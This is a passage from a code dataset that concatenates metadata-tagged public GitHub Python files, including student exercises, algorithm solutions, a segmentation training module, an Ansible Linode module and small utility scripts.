\"thon\".\nwrd=\"Python\"\nans_1 = wrd[2:]\nprint(ans_1)\n# Task 2 - Slice the word until \"o\". 
(Pyth)\nwrd=\"Python\"\nans_1 = wrd[:4]\nprint(ans_1)\n\n# Task 3 - Now try to get \"th\" only.\nwrd=\"Python\"\nans_1 = wrd[2:4]\nprint(ans_1)\n\n# Task 4 - Now slice the word with steps of 2, excluding first and last characters\n\nwrd=\"Python\"\nans_1 = wrd[1:-1:2]\nprint(ans_1)\n\n# Question 6\nfor number in range(4):\n\toutput = 'o' * number\n\tprint(output)\n# Question 7\ndef calculate_vat(amount):\n\treturn (amount * 1.2)\ntotal = calculate_vat(100)\nprint(total)\n\n# Write a new function to print a ‘cashier receipt’ output for a shop (any shop – clothes, food, events etc).\n# It should accept 3 items, then sum them up and print out a detailed receipt with TOTAL.\n\n# Question 8\n# Input:\n# Item_1_name = ‘Trainers’\n# Item_1_price = 50.45\n# Item_2_name = ‘T-shirt\n# Item_2_price = 12\n# Output:\n# Trainers\t50.45\n# T-shirt\t12.00\n# TOTAL \t62.45\n\n\n\ndef cashier_receipt(item_count):\n\titems = [];\n\tfor i in range(item_count):\n\t\titem = { }\n\t\titem_name = input(\"Item name :\")\n\t\titem['name'] = item_name\n\t\titem_price = int(input(\"Item Price:\"))\n\t\titem['price'] = item_price\n\t\titems.append((item))\n\t# print(items)\n\ttotal_cost = 0\n\tfor i in items:\n\t\ttotal_cost += i['price']\n\t\tprint(f\"{i['name']} {i['price']}\")\n\tprint(\"Total \",total_cost)\n\nno_of_items = int(input(\"No of items purchased : \"))\ncashier_receipt(no_of_items)\n\n\n\n\n\t# for i in range(item_count):\n\t# \tprint(items[i])\n\t# item_1_name = input(\"Item1 name :\")\n\t# item_1_price = int(input(\"Item1 Price:\"))\n\t# item_2_name = input(\"Item1 name :\")\n\t# item_2_price = int(input(\"Item1 Price:\"))\n\t# item_3_name = input(\"Item1 name :\")\n\t# item_3_price = int(input(\"Item1 Price:\"))","repo_name":"Jyothyrajs/CFGClassworks","sub_path":"Hw2.py","file_name":"Hw2.py","file_ext":"py","file_size_in_byte":2918,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"34859445010","text":"import os\n\nfrom bs4 import BeautifulSoup\n\nfrom dataobjects.detail_keeper_do import DetailsKeeperDO\nfrom filehandler.connection_creator import ConnectionCreator\nfrom stringfinder.reference_finder import ReferenceFinder\nfrom stringfinder.source_replacer import SourceReplacer\n\nfile_tree = dict()\nfile_creation_map = dict()\n\n\ndef incl_tree(file_name, target_dir_path):\n global file_tree\n global file_creation_map\n\n reference_finder = ReferenceFinder()\n with open(file_name) as source_file:\n source = source_file.read()\n source = source.replace(\"\\n\", \" \")\n php = reference_finder.get_php_occurrences(source)\n if php.__len__() != 0:\n includes = reference_finder.get_included_php_file_paths(php, DetailsKeeperDO.\n get_source_dir_path(DetailsKeeperDO),\n need_compl_path=True)\n if includes.__len__() != 0:\n for include_file in includes:\n if os.path.exists(str(include_file)):\n incl_counter = reference_finder.has_include(include_file)\n if incl_counter == 1:\n file_tree.update({include_file: file_name})\n incl_tree(include_file, target_dir_path)\n else:\n file_tree.update({include_file: file_name})\n # print(\"file created : \" + include_file)\n create_target_file(target_dir_path, include_file)\n if file_name in file_creation_map:\n count = file_creation_map[file_name]\n count = count + 1\n file_creation_map.update({file_name: count})\n else:\n count = 1\n file_creation_map.update({file_name: count})\n senior_file = file_tree[include_file]\n senior_count = file_creation_map[senior_file]\n if senior_count == includes.__len__():\n # 
print(\"file created : \" + senior_file)\n create_target_parent_file(target_dir_path, senior_file)\n if senior_file != check_root():\n supreme_file = file_tree[senior_file]\n if supreme_file in file_creation_map:\n supreme_count = file_creation_map[supreme_file]\n supreme_count = supreme_count + 1\n file_creation_map.update({supreme_file: supreme_count})\n else:\n supreme_count = 1\n file_creation_map.update({supreme_file: supreme_count})\n\n\ndef create_target_directory(directory_path):\n access_rights = 0o755\n if not os.path.exists(directory_path):\n os.mkdir(directory_path, access_rights)\n\n\ndef create_target_file(target_directory_path, source_file_path):\n target_content = \"\"\n target_file_path = \"\"\n source_replacer = SourceReplacer()\n create_target_directory(target_directory_path)\n avoided_file_list = DetailsKeeperDO.get_avoided_file_list(DetailsKeeperDO)\n if DetailsKeeperDO.get_db_conn_file(DetailsKeeperDO) == source_file_path:\n conn_creator = ConnectionCreator()\n target_content = conn_creator.get_new_database_access_file()\n target_file_path = target_directory_path + \"/\" + \"connection.php\"\n elif source_file_path not in avoided_file_list:\n base_name = os.path.basename(source_file_path)\n with open(source_file_path, \"r\") as source_file:\n source_code = source_file.read().replace(\"\\n\", \" \")\n target_file_path = target_directory_path + \"/\" + base_name\n # --check whether the files contain sql queries and convert them to joomla format\n source_code = source_replacer.replace_session_start(source_code)\n source_code = source_replacer.replace_session_details_assignment(source_code)\n source_code = source_replacer.replace_session_details_extraction(source_code)\n source_code = source_replacer.replace_media_references(source_code, source_file_path,\n DetailsKeeperDO.get_source_dir_path(DetailsKeeperDO))\n source_code = BeautifulSoup(source_code, \"html.parser\")\n target_content = source_code.prettify()\n if target_file_path != \"\":\n if not os.path.exists(target_file_path):\n with open(target_file_path, \"w\") as helper_file:\n helper_file.write(target_content)\n\n\ndef create_target_parent_file(target_directory_path, source_file_path):\n reference_finder = ReferenceFinder()\n source_replacer = SourceReplacer()\n base_name = os.path.basename(source_file_path)\n with open(source_file_path) as source_file:\n source_code = source_file.read().replace(\"\\n\", \" \")\n php_occurrences = reference_finder.get_php_occurrences(source_code)\n includes = reference_finder.get_included_php_file_paths(php_occurrences, source_dir_path=\"\",\n need_compl_path=False)\n requires = reference_finder.get_required_php_file_paths(php_occurrences, source_dir_path=\"\",\n need_compl_path=False)\n if includes.__len__() > 0:\n source_code = source_replacer.replace_includes(source_code, includes)\n if requires.__len__() > 0:\n source_code = source_replacer.replace_requires(source_code, requires)\n\n source_code = source_replacer.replace_session_start(source_code)\n source_code = source_replacer.replace_session_details_assignment(source_code)\n source_code = source_replacer.replace_session_details_extraction(source_code)\n source_code = source_replacer.replace_media_references(source_code, source_file_path,\n DetailsKeeperDO.get_source_dir_path(DetailsKeeperDO))\n\n source_code = BeautifulSoup(source_code, \"html.parser\")\n source_code = source_code.prettify()\n target_file_path = target_directory_path + \"/\" + base_name\n if not os.path.exists(target_file_path):\n with 
open(target_file_path, \"w+\") as helper_file:\n helper_file.write(source_code)\n\n\ndef print_tree():\n for key, val in file_creation_map.items():\n print(key + \" => \" + str(val))\n\n\ndef check_root():\n values = []\n for key, val in file_tree.items():\n values.append(val)\n return values[0]\n","repo_name":"ShanChathusanda93/python-devs","sub_path":"stringfinder/include_tree_detector.py","file_name":"include_tree_detector.py","file_ext":"py","file_size_in_byte":6653,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"22023402609","text":"\"\"\"\nHave the function FindIntersection(strArr) read the array of strings stored in strArr which will contain 2 elements:\nthe first element will represent a list of comma-separated numbers sorted in ascending order,\nthe second element will represent a second list of comma-separated numbers (also sorted).\nYour goal is to return a comma-separated string containing the numbers that occur in elements of strArr in sorted order.\nIf there is no intersection, return the string false. \"\"\"\n\ndef FindIntersection(strArr):\n\n # code goes here\n intersection = []\n list1 = strArr[0].split(\", \")\n list2 = strArr[1].split(\", \")\n for x in range(len(list1)):\n for y in range(len(list2)):\n if list1[x] == list2[y]:\n intersection.append(list1[x])\n result = \",\".join(intersection)\n if result == \"\":\n return \"false\"\n else:\n return result\n\n# keep this function call here\nprint(FindIntersection(input()))","repo_name":"dzgtr/coderbyte_challenges","sub_path":"5_find_intersection.py","file_name":"5_find_intersection.py","file_ext":"py","file_size_in_byte":942,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"584484478","text":"__all__ = [\"SegmentationLM\"]\n\n# standard libraries\nfrom typing import Any, Optional\n\n# third-party libraries\nimport hydra\nfrom omegaconf import DictConfig\nfrom pytorch_lightning.utilities.types import STEP_OUTPUT\nfrom torchmetrics.classification import (\n BinaryF1Score,\n BinaryRecall,\n BinaryPrecision,\n BinaryJaccardIndex,\n)\nimport torch\nfrom torchmetrics import MetricCollection\nimport lovely_tensors as lt\n\n# local modules\nfrom innofw.constants import SegDataKeys, SegOutKeys\nfrom innofw.core.models.torch.lightning_modules.base import BaseLightningModule\n\n\nlt.monkey_patch()\n\n\nclass SegmentationLM(BaseLightningModule):\n \"\"\"\n PyTorchLightning module for Semantic Segmentation task\n ...\n\n Attributes\n ----------\n model : nn.Module\n model to train\n losses : losses\n loss to use while training\n optimizer_cfg : cfg\n optimizer configurations\n scheduler_cfg : cfg\n scheduler configuration\n threshold: float\n threshold to use while training\n\n Methods\n -------\n forward(x):\n returns result of prediction\n model_load_checkpoint(path):\n load checkpoints to the model, used to start with pretrained weights\n\n \"\"\"\n\n def __init__(\n self,\n model,\n losses,\n # metrics, # todo: add\n optimizer_cfg,\n scheduler_cfg=None,\n threshold=0.5,\n *args: Any,\n **kwargs: Any,\n ):\n super().__init__(*args, **kwargs)\n if isinstance(model, DictConfig):\n self.model = hydra.utils.instantiate(model)\n else:\n self.model = model\n\n self.loss = hydra.utils.instantiate(losses)\n self.optim_config = optimizer_cfg\n self.scheduler_cfg = scheduler_cfg\n self.threshold = threshold\n\n metrics = MetricCollection(\n [\n BinaryF1Score(threshold=threshold),\n 
BinaryPrecision(threshold=threshold),\n BinaryRecall(threshold=threshold),\n BinaryJaccardIndex(threshold=threshold),\n ]\n )\n self.train_metrics = metrics.clone(prefix=\"train_\")\n self.val_metrics = metrics.clone(prefix=\"val_\")\n self.test_metrics = metrics.clone(prefix=\"test_\")\n\n # self.scaler = GradScaler(enabled=True)\n self.save_hyperparameters(\n ignore=[\"metrics\", \"optim_config\", \"scheduler_cfg\"]\n )\n\n def model_load_checkpoint(self, path):\n self.model.load_state_dict(torch.load(path)[\"state_dict\"])\n\n def forward(self, raster):\n return self.model(raster)\n\n def configure_optimizers(self):\n output = {}\n\n # instantiate the optimizer\n optimizer = hydra.utils.instantiate(\n self.optim_config, params=self.model.parameters()\n )\n output[\"optimizer\"] = optimizer\n\n if self.scheduler_cfg is not None:\n # instantiate the scheduler\n scheduler = hydra.utils.instantiate(\n self.scheduler_cfg, optimizer=optimizer\n )\n output[\"lr_scheduler\"] = scheduler\n\n return output\n\n # def backward(\n # self,\n # loss: Tensor,\n # optimizer: Optional[Optimizer],\n # optimizer_idx: Optional[int],\n # *args,\n # **kwargs,\n # ) -> None:\n # # return super().backward(loss, optimizer, optimizer_idx, *args, **kwargs):\n # self.scaler.scale(loss).backward()\n # self.scaler.step(optimizer)\n # self.scaler.update()\n # self.scheduler.step()\n # torch.cuda.synchronize()\n\n def compute_loss(self, predictions, labels):\n loss = self.loss(predictions, labels)\n\n # with autocast(enabled=train_cfg[\"AMP\"]):\n # logits = model(img)\n # loss = loss_fn(logits, lbl)\n return loss\n # return self.scaler.scale(loss) # todo: refactor !!!!\n\n def compute_metrics(self, stage, predictions, labels):\n if stage == \"train\":\n return self.train_metrics(predictions.view(-1), labels.view(-1))\n elif stage == \"val\":\n out1 = self.val_metrics(predictions.view(-1), labels.view(-1))\n return out1\n elif stage == \"test\":\n return self.test_metrics(predictions.view(-1), labels.view(-1))\n\n def log_losses(self, stage, losses_res):\n self.log(\n f\"{stage}_loss\", losses_res, sync_dist=True\n ) # todo: check when to use this sync_dist=True\n\n def log_metrics(self, stage, metrics_res):\n for key, value in metrics_res.items():\n self.log(key, value, sync_dist=True)\n\n def stage_step(self, stage, batch, do_logging=False, *args, **kwargs):\n output = dict()\n # todo: check that model is in mode no autograd\n raster, label = batch[SegDataKeys.image], batch[SegDataKeys.label]\n\n predictions = self.forward(raster)\n # if (\n # predictions.max() > 1 or predictions.min() < 0\n # ): # todo: should be configurable via cfg file\n # predictions = torch.sigmoid(predictions)\n\n output[SegOutKeys.predictions] = predictions\n\n if stage in [\"train\", \"val\"]:\n loss = self.compute_loss(predictions, label)\n self.log_losses(stage, loss)\n output[\"loss\"] = loss\n\n if stage != \"predict\":\n metrics = self.compute_metrics(\n stage, predictions, label\n ) # todo: uncomment\n self.log_metrics(stage, metrics)\n\n return output\n\n def training_step(self, batch, *args, **kwargs) -> STEP_OUTPUT:\n return self.stage_step(\"train\", batch, do_logging=True)\n\n def validation_step(self, batch, *args, **kwargs) -> Optional[STEP_OUTPUT]:\n return self.stage_step(\"val\", batch)\n\n def test_step(self, batch, *args, **kwargs) -> Optional[STEP_OUTPUT]:\n return self.stage_step(\"test\", batch)\n\n # def predict_step(self, batch: Any, batch_idx: int, dataloader_idx: Optional[int] = None) -> Any:\n # tile, coords = 
batch[SegDataKeys.image], batch[SegDataKeys.coords]\n #\n # prediction = self.forward(tile)\n # if dataloader_idx is None:\n # self.trainer.predict_dataloaders[0].dataset.add_prediction(prediction, coords, batch_idx)\n # else:\n # self.trainer.predict_dataloaders[dataloader_idx].dataset.add_prediction(prediction, coords, batch_idx)\n","repo_name":"InnopolisUni/innofw","sub_path":"innofw/core/models/torch/lightning_modules/segmentation_qb.py","file_name":"segmentation_qb.py","file_ext":"py","file_size_in_byte":6399,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"53"} +{"seq_id":"10898391128","text":"# Leetcode 143\n# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, val=0, next=None):\n# self.val = val\n# self.next = next\nclass Solution:\n def reorderList(self, head: Optional[ListNode]) -> None:\n \"\"\"\n Do not return anything, modify head in-place instead.\n \"\"\"\n if head is None:\n return\n \n # Step 1: split the LL into two halves, find the middle node\n slow = fast = head\n while fast and fast.next:\n slow = slow.next\n fast = fast.next.next\n \n #Step 2: Reverse the second part of the LL\n prev = None\n current = slow\n \n while current:\n temp = current.next\n current.next = prev\n prev = current\n current = temp\n \n #Step 3: Merge the two linked list\n first = head\n second = prev\n while second.next:\n tmp = first.next\n first.next = second\n first = tmp\n \n tmp = second.next\n second.next = first\n second = tmp\n","repo_name":"snagari-coder/Data_Structure_Algorithms","sub_path":"Linked_List/ReorderLinkedList.py","file_name":"ReorderLinkedList.py","file_ext":"py","file_size_in_byte":1139,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"1855073703","text":"\"\"\" Test utility classes \"\"\"\n\nimport os, sys, signal\nimport subprocess\nimport logging\nimport time\nimport socket\n\nfrom tempfile import mkdtemp, mkstemp\nfrom shutil import rmtree\n\nfrom pymongo import Connection\nfrom pymongo.errors import ConnectionFailure\n\ndef get_unused_port():\n \"\"\" Vulnerable to race conditions but good enough for now\"\"\"\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n s.bind(('localhost', 0))\n addr, port = s.getsockname()\n s.close()\n return port\n\ndef wait_for_port(host, port):\n s = socket.socket()\n while True:\n try:\n s.connect((host, port))\n s.close()\n return\n\n except socket.error:\n time.sleep(0.1)\n\ndef wait_for_process_exit(pid):\n while True:\n try:\n os.kill(pid, 0)\n except OSError:\n return\n\ndef wait_for_pidfile(file_name):\n while True:\n try:\n pid = int(open(file_name).read())\n os.kill(pid, 0)\n return\n\n except (ValueError, TypeError, OSError, IOError):\n time.sleep(0.1)\n\ndef wait_for_mongodb(host, port):\n while True:\n try:\n conn = Connection(host, port, network_timeout=1)\n conn.disconnect()\n return\n\n except ConnectionFailure:\n time.sleep(0.1)\n","repo_name":"andreisavu/automatic-testing-demo","sub_path":"demo/test/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1188,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"73719267687","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\n\"\"\"This module allows users to retrieve information about a Linode Token.\"\"\"\n\nfrom __future__ import absolute_import, division, print_function\n\nfrom typing import Any, Optional\n\nimport 
ansible_collections.linode.cloud.plugins.module_utils.doc_fragments.token as docs_parent\nimport ansible_collections.linode.cloud.plugins.module_utils.doc_fragments.token_info as docs\nfrom ansible_collections.linode.cloud.plugins.module_utils.linode_common import (\n LinodeModuleBase,\n)\nfrom ansible_collections.linode.cloud.plugins.module_utils.linode_docs import (\n global_authors,\n global_requirements,\n)\nfrom ansible_collections.linode.cloud.plugins.module_utils.linode_helper import (\n filter_null_values,\n)\nfrom ansible_specdoc.objects import (\n FieldType,\n SpecDocMeta,\n SpecField,\n SpecReturnValue,\n)\nfrom linode_api4 import PersonalAccessToken\n\nspec = {\n # Disable the default values\n \"state\": SpecField(type=FieldType.string, required=False, doc_hide=True),\n \"id\": SpecField(\n type=FieldType.integer,\n description=[\"The ID of the token.\"],\n conflicts_with=[\"label\"],\n ),\n \"label\": SpecField(\n type=FieldType.string,\n description=[\"The label of the token.\"],\n conflicts_with=[\"id\"],\n ),\n}\n\nSPECDOC_META = SpecDocMeta(\n description=[\"Get info about a Linode Personal Access Token.\"],\n requirements=global_requirements,\n author=global_authors,\n options=spec,\n examples=docs.specdoc_examples,\n return_values={\n \"token\": SpecReturnValue(\n description=\"The token in JSON serialized form.\",\n docs_url=\"https://www.linode.com/docs/api/profile/\"\n \"#personal-access-token-create__response-samples\",\n type=FieldType.dict,\n sample=docs_parent.result_token_samples,\n )\n },\n)\n\n\nclass Module(LinodeModuleBase):\n \"\"\"Module for getting info about a Linode token\"\"\"\n\n def __init__(self) -> None:\n self.module_arg_spec = SPECDOC_META.ansible_spec\n self.results = {\"token\": None}\n\n super().__init__(\n module_arg_spec=self.module_arg_spec,\n required_one_of=[(\"id\", \"label\")],\n mutually_exclusive=[(\"id\", \"label\")],\n )\n\n def _get_token_by_label(self, label: str) -> Optional[PersonalAccessToken]:\n try:\n return self.client.profile.tokens(\n PersonalAccessToken.label == label\n )[0]\n except IndexError:\n return self.fail(\n msg=\"failed to get token with label {0}: \"\n \"token does not exist\".format(label)\n )\n except Exception as exception:\n return self.fail(\n msg=\"failed to get token {0}: {1}\".format(label, exception)\n )\n\n def _get_token_by_id(self, token_id: int) -> PersonalAccessToken:\n return self._get_resource_by_id(PersonalAccessToken, token_id)\n\n def exec_module(self, **kwargs: Any) -> Optional[dict]:\n \"\"\"Entrypoint for token info module\"\"\"\n\n params = filter_null_values(self.module.params)\n\n if \"id\" in params:\n self.results[\"token\"] = self._get_token_by_id(\n params.get(\"id\")\n )._raw_json\n\n if \"label\" in params:\n self.results[\"token\"] = self._get_token_by_label(\n params.get(\"label\")\n )._raw_json\n\n return self.results\n\n\ndef main() -> None:\n \"\"\"Constructs and calls the module\"\"\"\n Module()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"linode/ansible_linode","sub_path":"plugins/modules/token_info.py","file_name":"token_info.py","file_ext":"py","file_size_in_byte":3576,"program_lang":"python","lang":"en","doc_type":"code","stars":40,"dataset":"github-code","pt":"53"} +{"seq_id":"15569046131","text":"'''\r\nCreated on 19/set/2017\r\n\r\n@author: Virgilio Cima\r\n'''\r\n\r\nclass ClsSessione(object):\r\n '''\r\n classdocs\r\n '''\r\n\r\n def __init__(self, cod_cts, consegna, data_inizio, path_dat, path_cfg, path_log,operatore,note):\r\n self.id_sessione=0\r\n 
self.cod_cts=cod_cts\r\n self.consegna=consegna\r\n self.data_inizio=data_inizio\r\n self.path_dat=path_dat\r\n self.path_cfg=path_cfg\r\n self.path_log=path_log # meaningful?\r\n self.operatore=operatore\r\n self.note=note\r\n","repo_name":"raffaele59/PythonDev","sub_path":"GeoControlli_RT/GeoControlli_RT/Main/ClsSessione.py","file_name":"ClsSessione.py","file_ext":"py","file_size_in_byte":523,"program_lang":"python","lang":"it","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"40310049400","text":"import sys\nimport heapq\n\ndef solution(n, stars):\n parents = [i for i in range(n)]\n graph = []\n ans = 0\n\n def dist(star1, star2) :\n x1, y1 = star1\n x2, y2 = star2\n return ((x1 - x2)**2 + (y1 - y2)**2)**(1/2)\n\n\n def find(star) :\n if parents[star] != star :\n parents[star] = find(parents[star])\n return parents[star]\n \n def union(star1, star2) :\n p1 = find(star1)\n p2 = find(star2)\n\n parents[max(p1, p2)] = min(p1, p2)\n\n for i in range(n-1) :\n for j in range(i+1,n) :\n heapq.heappush(graph, (dist(stars[i], stars[j]), i, j))\n \n while graph :\n cost, x, y = heapq.heappop(graph)\n\n if find(x) == find(y) :\n continue\n else :\n union(x, y)\n ans += cost\n\n\n print(f\"{ans:.2f}\")\n\n\n\n\n\nif __name__ == \"__main__\" :\n input = sys.stdin.readline\n n = int(input())\n stars = [tuple(map(float, input().split())) for _ in range(n)]\n solution(n, stars)\n\n\n\n# Expected that distances could be computed relative to the origin (0,0) -> Wrong answer.\n# import sys\n# import heapq\n\n# def solution(n, stars):\n# parents = [i for i in range(n)]\n# ans = 0\n\n# def find(star) :\n# if parents[star] != star :\n# parents[star] = find(parents[star])\n# return parents[star]\n \n# def union(star1, star2) :\n# p1 = find(star1)\n# p2 = find(star2)\n\n# parents[max(p1, p2)] = min(p1, p2)\n\n# prev = heapq.heappop(stars)\n# while stars :\n# next = heapq.heappop(stars)\n\n# if find(prev[3]) != find(next[3]) :\n# union(prev[3], next[3])\n# ans += ((prev[1] - next[1])**2 + (prev[2] - next[2])**2)**(1/2)\n \n# prev = next\n \n# print(f\"{ans:.2f}\")\n\n\n\n\n\n# if __name__ == \"__main__\" :\n# input = sys.stdin.readline\n# n = int(input())\n# stars = []\n# for i in range(n) :\n# x, y = map(float, input().split())\n# heapq.heappush(stars, (x**2 + y**2, x, y, i))\n# solution(n, stars)","repo_name":"choisaywhy/boj","sub_path":"workbook/12/4386.py","file_name":"4386.py","file_ext":"py","file_size_in_byte":2080,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"14389871180","text":"# utility script that takes the large csv file with the unlabeled data\n# and chops it up into bite-sized pieces\n# author: David Thaler\n\nimport csv\n\nINFILE = '../data/unlabeled/extra_unsupervised_data.csv'\nOUTFILE_STR = '../data/unlabeled/extra_%d_%d.csv'\nBATCH_SZ = 5000\nf_in = open(INFILE,'rb')\nreader = csv.reader(f_in)\nf_out = open(OUTFILE_STR % (1, BATCH_SZ),'wb')\nwriter = csv.writer(f_out)\nidx = 0\nfor row in reader:\n idx += 1\n writer.writerow(row)\n if idx % BATCH_SZ == 0:\n f_out.close()\n end = idx + BATCH_SZ\n start = idx + 1\n f_out = open(OUTFILE_STR % (start, end),'wb')\n writer = csv.writer(f_out)\n\n#NB: this leaves the end of the last file slightly misnamed/oddly-sized\nf_out.close()","repo_name":"TitasNandi/ICML-BlackBox-Challenge","sub_path":"Sparse_Filtering/batchup.py","file_name":"batchup.py","file_ext":"py","file_size_in_byte":713,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"1160768598","text":"# Exercise App\nimport csv\nimport database\nfrom datetime import date\nfrom datetime import datetime\n\nprompt = \"Welcome to the exercise log.\\n\"\nprint(prompt)\nselection = input(\"What would you like to do? 1=single entry, 2=multiple entires, \\\n3=csv file, or '4' to exit. \")\nwhile True:\n if selection == '4':\n print('Goodbye')\n break\n elif selection == '3':\n print(\"placeholder for csv file\")\n break\n\n\n ### START HERE NEXT ###\n # this section sucessfully takes the input...\n # however, it does not print the output when calling the functions\n # I think I need to change the indentation or...\n # remove / alter a break from one of the if statements\n elif selection == '2' or selection == '1':\n log_lst = []\n print(\"-----------test for selection 1 or 2 ------------------\")\n while True:\n add_entry = input(\"Would you like to make an entry? (Y/N): \").upper()\n if add_entry == 'N':\n print(\"No further entries. Exiting the program...\")\n print(\"---------break successful----------------\")\n break\n\n elif add_entry == 'Y':\n print(\"---------------add_entry 'yes' test successful------------\")\n\n # get user input for the date\n def today_date(date):\n date = input(\"Provide the date (e.g 01/25/2022) or hit \\'enter\\' for today's date: \")\n while date != 'exit'.lower():\n if date == 'exit'.lower():\n break\n elif date == \"\":\n tday = datetime.today()\n tday = tday.strftime('%m/%d/%Y')\n year = tday[6:10]\n month = tday[:2]\n dym = tday, int(year), int(month)\n return dym\n elif len(date)==10 and '/' in date:\n tday = date\n year = tday[6:10]\n month = tday[:2]\n dym = tday, int(year), int(month)\n return dym\n else:\n print(\"DATE FORMAT ERROR! Month and day must be two digits.\")\n\n date = input(\"Provide the date (e.g 01/25/2022) or hit \\'enter\\' for today's date: \")\n # function to get user input for miles walked\n def miles_walked():\n miles = input(\"Enter miles walked or hit 'exit': \")\n while miles != 'exit'.lower():\n if miles == 'exit'.lower():\n break\n elif miles.isdigit() and '.' not in miles:\n print(f'You walked {miles} miles.')\n return int(miles)\n elif miles.isdigit() and '.' in miles:\n print(f'You walked {miles} miles.')\n return int(miles)\n else:\n print(\"ERROR! Enter a digit.\")\n\n miles = input(\"Enter miles walked or hit 'exit': \")\n\n # call the functions\n # append the output of the functions into a list\n lst = []\n for item in today_date(date):\n lst.append(item)\n lst.append(miles_walked())\n print(\"------------ func call successful -----------------\")\n log_lst.append(lst)\n print(\"-------------test list input -----------------------\")\n print(log_lst)\n continue\n break\n\n # OUTER WHILE LOOP: exit if user does not select an entry 1-4\n else:\n print(\"Invalid entry. 
Exiting the program....\")\n break\n # call the database.py functions to add records to the db\n # database.add_one(log_lst)\n database.add_many(log_lst)\n print(database.show_all())\n","repo_name":"ARCtechmo/exercise_app","sub_path":"ex_app.py","file_name":"ex_app.py","file_ext":"py","file_size_in_byte":4082,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74375963047","text":"import cv2\r\n\r\nimg = cv2.imread('fahmi.PNG')\r\n\r\nface = cv2.CascadeClassifier('face-detect.xml')\r\neye = cv2.CascadeClassifier('eye-detect.xml')\r\n\r\ngray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\r\n\r\nmuka = face.detectMultiScale(gray, 1.3, 5)\r\nfor (x,y,w,h) in muka:\r\n cv2.rectangle(img, (x,y), (x+w, y+h), (0,255,0), 2)\r\n\r\n cv_warna = img[y:y+h, x:x+w]\r\n cv_gray = gray[y:y+h, x:x+w]\r\n mata = eye.detectMultiScale(cv_gray, 1.5, 3)\r\n for (mx,my,mw,mh) in mata:\r\n cv2.rectangle(cv_warna, (mx,my), (mx+mw, my+mh), (255, 255, 0), 1)\r\n\r\ncv2.imshow('Foto Normal', img)\r\ncv2.waitKey(0)\r\ncv2.destroyAllWindows()\r\n","repo_name":"Fahmifc123/OpenCV-Indonesia","sub_path":"2. detect_mata.py","file_name":"2. detect_mata.py","file_ext":"py","file_size_in_byte":621,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"16551818763","text":"from board import *\nfrom solution import *\n\nif __name__ == \"__main__\":\n\t\n\t#create board\n\tfilename = 'test_case.txt'\n\tboard = Board()\t\n\tboard.grid = board.load_board(filename)\n\n\t#find answer\n\tsol = Solution()\n\tboard.grid = sol.solution_(board.grid)\n\n\t# load actual answer:\n\tfilename = 'answer.txt'\n\tanswer_board = Board()\n\tanswer_board.grid = answer_board.load_board(filename)\n\n\t# compare 2 answers:\n\tif answer_board.is_same(board) == True:\n\t\tprint(\"The solution is true \")\n\t\tboard.print_board()\n\telse :\n\t\tprint(\"Wrong solution\")\n\n","repo_name":"nnkhang19/Sudoku_using_backtracking","sub_path":"solve.py","file_name":"solve.py","file_ext":"py","file_size_in_byte":530,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"2683007382","text":"#!/usr/bin/python3\r\n\"\"\" Minimum Operations Algorithm Problem \"\"\"\r\n\r\n\r\ndef minOperations(n: int) -> int:\r\n \"\"\" Calculates minimum number of operations required to create a string \"\"\"\r\n \"\"\" of input n length \"\"\"\r\n\r\n if not n or not isinstance(n, int) or n <= 1:\r\n return 0\r\n count = 1\r\n operations_list = []\r\n while n > 1:\r\n count += 1\r\n while (n % count == 0 and n > 1):\r\n n /= count\r\n operations_list.append(count)\r\n return sum(operations_list)\r\n","repo_name":"angelofgrace/holbertonschool-interview","sub_path":"0x02-minimum_operations/0-minoperations.py","file_name":"0-minoperations.py","file_ext":"py","file_size_in_byte":510,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19546980532","text":"from django.contrib.auth import get_user_model\nfrom django.contrib.auth.models import AbstractUser\nfrom django.db import models\n\n\nclass CustomUser(AbstractUser):\n email = models.EmailField(\n max_length=254,\n unique=True,\n verbose_name='Электронная почта'\n )\n first_name = models.CharField(\n max_length=150,\n verbose_name='Имя'\n )\n last_name = models.CharField(\n max_length=150,\n verbose_name='Фамилия'\n )\n\n class Meta:\n verbose_name = \"Пользователь\"\n verbose_name_plural = \"Пользователи\"\n\n def 
